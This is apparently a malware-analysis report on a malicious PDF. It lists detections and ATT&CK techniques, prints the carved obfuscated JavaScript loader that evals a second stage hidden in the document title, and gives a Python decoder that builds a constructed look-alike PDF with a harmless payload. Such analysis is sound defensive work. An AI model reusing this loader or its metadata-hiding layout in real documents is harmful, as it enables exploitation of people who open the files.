Malicious PDF — malware analysis report

Static analysis result for SHA-256 2e186a2d3f11eb93…

Verdict: MALICIOUS
File type: PDF
Size: 3.2 KB
MD5: 4f9c419c51b8d11ef0b000faf47213ba
SHA-1: ba7689ea5f801c99fbc12b60d6cc684ba4b67a87
SHA-256: 2e186a2d3f11eb93a30591226ab56176167638bab01a851d58c651f483645e9d
Risk score: 206

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The PDF carries an obfuscated JavaScript stream that is a loader rather than the exploit itself. The carved script reads the document's /Info /Title (this.info.title), keeps every second character of it, assembles the string "eval" from a lookup array (wzUd[5]+wzUd[12]+wzUd[15]+wzUd[21]) and passes the de-interleaved title to this["eval"]. The real second stage therefore lives in the title metadata, outside the carved /JS object, which is why the preview contains no exploit code of its own. The trailing new_player_end() function calls an undefined helper npl() three times around a this[m][np](null) call wrapped in try/catch; that is the shape of a spray-then-trigger stub, with npl and the method names m and np expected to be defined by the eval'd stage. Note that the carved stream itself contains no unescape() call: the exploit-cluster heuristic fired on the character-array eval surrounding a /JavaScript action, and any unescape()-based decoding would sit in the hidden stage. The ML classifier and the ClamAV signature agree on the verdict. Whether the second stage downloads a further payload or carries its shellcode inline cannot be confirmed from the carved stream alone; recovering and decoding the /Title is the next analysis step.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics (4)

  • ClamAV: Pdf.Exploit.Agent-36121 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36121
  • JavaScript action [low] PDF_JAVASCRIPT (2 related findings)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster [critical] PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream [low] PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0007_000.js
SHA-256:  c292f097f485ba5b8af1203e31a409e21d2d9c1f9292c5ac0bae2d95bb59053c
Kind:     pdf-javascript-stream
Source:   PDF /JS object 7 at offset 0x9C9
Size:     436 bytes
Preview script
First 1,000 lines of the extracted script
k06PA = this.info.title;                 // analyst note: payload source is the document Title metadata
m1SMUKr = "";
for (i = 0; i < k06PA.length; i += 2) {  // analyst note: keep every second character
    m1SMUKr += k06PA.charAt(i);
}
T8w3 = this;
wzUd = ['X','4','C','S','C','e','V','O','5','8','4','8','v','W','B','a','m','e','v','7','6','l','F'];
I8036 = wzUd[5] + wzUd[12] + wzUd[15] + wzUd[21];   // analyst note: 'e'+'v'+'a'+'l' = "eval"
J41g0e = T8w3[I8036];                                // analyst note: this["eval"]
J41g0e(m1SMUKr);                                     // analyst note: eval(decoded title)
function new_player_end(printd, randstr, m, np) {    // analyst note: npl() is not defined in this stream
    npl(printd, randstr);
    npl(printd, randstr);
    try { this[m][np](null); } catch (e) {}
    npl(printd, randstr);
}
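Recovering the hidden stage, as an added example written for this report (it is not tooling from the analysis platform and not code from the sample): the Python below builds a constructed minimal PDF with the same layout the carved loader relies on (a /JavaScript action pointing at a /JS stream, the second stage interleaved into /Info /Title), then extracts the title, resolves the wzUd[...] lookups to the method name, reads the loop stride from the for statement and de-interleaves the title. The stand-in payload app.alert('stage two'), the object numbering and the '#' junk characters are assumptions; the loader logic is the one shown in the preview.

```python
import re
import zlib
# Constructed sample (not the carved artifact): a minimal uncompressed PDF laid out the way
# the analysed file is described above. The payload is a harmless stand-in for the exploit
# code; it is hidden in /Info /Title with a junk character after every real one.
REAL_PAYLOAD = "app.alert('stage two');"
TITLE = "".join(c + "#" for c in REAL_PAYLOAD)        # real code at even offsets, junk at odd ones

# The loader, same logic as the preview: every second title char, "eval" from wzUd, this["eval"](...)
CARVED_JS = (
    'k06PA=this.info.title;m1SMUKr="";for (i=0;i<k06PA.length;i +=2){ m1SMUKr +=k06PA.charAt(i); }'
    "T8w3=this; wzUd=['X','4','C','S','C','e','V','O','5','8','4','8','v','W','B','a','m','e','v','7','6','l','F'];"
    "I8036=wzUd[5]+wzUd[12]+wzUd[15]+wzUd[21];J41g0e=T8w3[I8036];J41g0e(m1SMUKr);"
)

def build_pdf(title: str, js: str) -> bytes:
    """Catalog -> /OpenAction -> /JavaScript action -> /JS stream; title in the /Info dictionary."""
    js_b = js.encode()
    return (
        b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /Title (" + title.encode() + b") /Producer (constructed) >> endobj\n"
        b"4 0 obj << /S /JavaScript /JS 5 0 R >> endobj\n"
        b"5 0 obj << /Length " + str(len(js_b)).encode() + b" >>\nstream\n" + js_b + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R /Info 3 0 R >>\n%%EOF\n"
    )
SAMPLE_PDF = build_pdf(TITLE, CARVED_JS)

def read_literal_string(data: bytes, start: int) -> str:
    """Read the PDF literal string whose '(' is at data[start]; handles nested parens and backslash escapes."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                      # escaped byte: keep it verbatim (sufficient for this loader)
            out += data[i + 1:i + 2]
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            return out.decode("latin-1")
        if i > start:
            out += c
        i += 1
    raise ValueError("unterminated literal string")

def extract_info_title(pdf: bytes) -> str:
    m = re.search(rb"/Title\s*\(", pdf)
    if not m:
        raise ValueError("no /Title literal string found")
    return read_literal_string(pdf, m.end() - 1)

def extract_js(pdf: bytes) -> str:
    """Return /JS code whether inline (literal string) or in a referenced stream (inflating FlateDecode)."""
    m = re.search(rb"/JS\s*(\(|(\d+)\s+\d+\s+R)", pdf)
    if not m:
        raise ValueError("no /JS entry found")
    if m.group(1) == b"(":
        return read_literal_string(pdf, m.end() - 1)
    obj = re.search(rb"(?<!\d)" + m.group(2) + rb"\s+\d+\s+obj\s*(<<.*?>>)\s*stream\r?\n(.*?)\r?\nendstream", pdf, re.S)
    if not obj:
        raise ValueError("referenced /JS object not found")
    raw = zlib.decompress(obj.group(2)) if b"/FlateDecode" in obj.group(1) else obj.group(2)
    return raw.decode("latin-1")

def resolve_indexed_aliases(script: str) -> dict:
    """Resolve names built as ARR[i]+ARR[j]+... from a literal string array, e.g. {'I8036': 'eval'}."""
    arrays = {name: re.findall(r"'([^']*)'", body)
              for name, body in re.findall(r"(\w+)\s*=\s*\[([^\]]*)\]", script)}
    aliases = {}
    for name, expr in re.findall(r"(\w+)\s*=\s*((?:\w+\[\d+\]\s*\+\s*)*\w+\[\d+\])\s*;", script):
        parts = re.findall(r"(\w+)\[(\d+)\]", expr)
        if all(arr in arrays for arr, _ in parts):
            aliases[name] = "".join(arrays[arr][int(i)] for arr, i in parts)
    return aliases

def find_dynamic_sink(script: str, aliases: dict):
    """Find FN=OBJ[ALIAS]; ... FN(ARG); and return (resolved method name, argument variable)."""
    for fn, _obj, alias in re.findall(r"(\w+)\s*=\s*(\w+)\[(\w+)\]\s*;", script):
        call = re.search(rf"\b{re.escape(fn)}\s*\(\s*(\w+)\s*\)", script)
        if alias in aliases and call:
            return aliases[alias], call.group(1)
    return None, None

def title_stride(script: str) -> int:
    """The loop increment says which characters of the title are real code (2 = every second one)."""
    m = re.search(r"for\s*\(\s*\w+\s*=\s*0\s*;[^;]*;\s*\w+\s*\+=\s*(\d+)\s*\)", script)
    return int(m.group(1)) if m else 1

def decode_payload(pdf: bytes) -> dict:
    js = extract_js(pdf)
    aliases = resolve_indexed_aliases(js)
    sink, arg = find_dynamic_sink(js, aliases)
    title = extract_info_title(pdf)
    return {"aliases": aliases, "sink": sink, "argument": arg, "title": title, "payload": title[::title_stride(js)]}

if __name__ == "__main__":
    r = decode_payload(SAMPLE_PDF)
    print("sink: this[%r](%s)" % (r["sink"], r["argument"]), "| aliases:", r["aliases"])
    print("stored title:", r["title"])
    print("second stage:", r["payload"])
```

Against the constructed file this reports the sink as this['eval'](m1SMUKr) and prints the de-interleaved title as the second stage. On a real sample, point extract_js and extract_info_title at the file bytes and inspect the recovered stage statically; do not feed it to a JavaScript engine, since it is the part expected to define npl() and the method names consumed by new_player_end(). The extractor handles literal-string titles and uncompressed or FlateDecode /JS streams only; hex-string (<...>) or UTF-16 titles, object streams, and loaders that read /Subject, /Keywords or XMP instead of /Title need the lookups widened.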